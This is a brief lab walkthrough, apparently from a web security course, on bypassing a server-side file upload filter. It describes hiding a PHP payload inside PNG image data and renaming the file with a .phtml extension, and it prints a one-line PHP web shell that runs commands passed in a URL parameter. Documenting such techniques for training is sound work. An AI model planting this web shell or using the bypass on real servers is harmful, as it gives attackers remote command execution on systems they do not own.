Insecure file upload 0x03

The filter actually working in server side and it finds that .php extensions are not allowed

But it reality it is just checking the format data of the file

So that we can just insert our PHP payload in the PNG data like the details below

File name from tcm-logo.png to cmd4.phtml

Then file extensions like php5,php4,php3,php2,php1 is not working since it does not executes image type which in our data section

We just have to change the php extension to phtml since it is also valid

<?php system($_GET['cmd']); ?>

Now we can execute command injection